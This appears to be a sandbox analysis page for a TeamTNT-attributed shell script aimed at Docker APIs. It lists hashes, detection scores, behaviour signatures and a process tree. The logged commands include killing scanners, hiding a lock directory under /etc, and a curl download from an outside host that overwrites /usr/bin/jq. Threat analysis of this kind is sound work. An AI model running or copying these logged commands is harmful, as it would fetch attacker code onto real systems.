Overview

overview

10

Static

static

10

SugarLogic...AWS.sh

ubuntu-18.04-amd64

6

SugarLogic...AWS.sh

debian-9-armhf

6

SugarLogic...AWS.sh

debian-9-mips

6

SugarLogic...AWS.sh

debian-9-mipsel

6

SugarLogic...nge.sh

ubuntu-18.04-amd64

6

SugarLogic...nge.sh

debian-9-armhf

6

SugarLogic...nge.sh

debian-9-mips

6

SugarLogic...nge.sh

debian-9-mipsel

6

SugarLogic...tup.sh

windows7-x64

3

SugarLogic...tup.sh

windows10-2004-x64

3

SugarLogic...bot.sh

windows7-x64

3

SugarLogic...bot.sh

windows10-2004-x64

3

SugarLogic...d_2.sh

ubuntu-18.04-amd64

7

SugarLogic...d_2.sh

debian-9-armhf

7

SugarLogic...d_2.sh

debian-9-mips

7

SugarLogic...d_2.sh

debian-9-mipsel

7

SugarLogic...oit.sh

windows7-x64

3

SugarLogic...oit.sh

windows10-2004-x64

3

SugarLogic...arch64

ubuntu-18.04-amd64

SugarLogic...arch64

debian-9-armhf

SugarLogic...arch64

debian-9-mips

SugarLogic...arch64

debian-9-mipsel

SugarLogic...x86_64

ubuntu-22.04-amd64

10

SugarLogic.../bot_u

ubuntu-22.04-amd64

10

SugarLogic...en2.sh

ubuntu-18.04-amd64

3

SugarLogic...en2.sh

debian-9-armhf

4

SugarLogic...en2.sh

debian-9-mips

3

SugarLogic...en2.sh

debian-9-mipsel

3

SugarLogic...cap.so

ubuntu-22.04-amd64

1

SugarLogic.../mo.sh

ubuntu-18.04-amd64

7

SugarLogic.../mo.sh

debian-9-armhf

7

SugarLogic.../mo.sh

debian-9-mips

10

Analysis

  • max time kernel
    150s
  • max time network
    132s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    29-12-2024 23:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh

  • Size

    21KB

  • MD5

    d0295e4ffb268b65f19e7e315f6ec5c6

  • SHA1

    0164ad6ed68acd956395202fe8fd6561fe10e62c

  • SHA256

    0dab485f5eacbbaa62c2dd5385a67becf2c352f2ebedd2b5184ab4fba89d8f19

  • SHA512

    5795640f96e8f5514cce674e46fc2cac5c9d91c53ec7bc45e42ecb315a13851aabd83a9ed11702d7112179ea74f2f6b27febc77204aa6937409e873ec920b33a

  • SSDEEP

    192:9Uml6l+q7osa5zmPXArSKUpVkzzfbmpWMzAH53p1RMFKodJZIYIHAFDMXT:mtHssOTmpWCAHvCdYHAFDkT

Score
6/10
discovery

Malware Config

Signatures

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 3 IoCs
    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery

Processes

  • /tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh
    "/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/Docker-API.IP.Range.sh"
    1⤵
      PID:1506
      • /bin/mkdir
        mkdir -p /etc/.../.docker-api.ip.range.lock/
        2⤵
          PID:1507
        • /usr/bin/pkill
          pkill masscan
          2⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1508
        • /usr/bin/pkill
          pkill pnscan
          2⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1509
        • /usr/bin/pkill
          pkill zgrab
          2⤵
          • Reads CPU attributes
          • Reads runtime system information
          PID:1510
        • /usr/bin/curl
          curl -sLk http://dl1.chimaera.cc:443/sugarcrm/themes/default/images/SugarLogic/.../jq/x86_64 -o /usr/bin/jq
          2⤵
            PID:1511

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads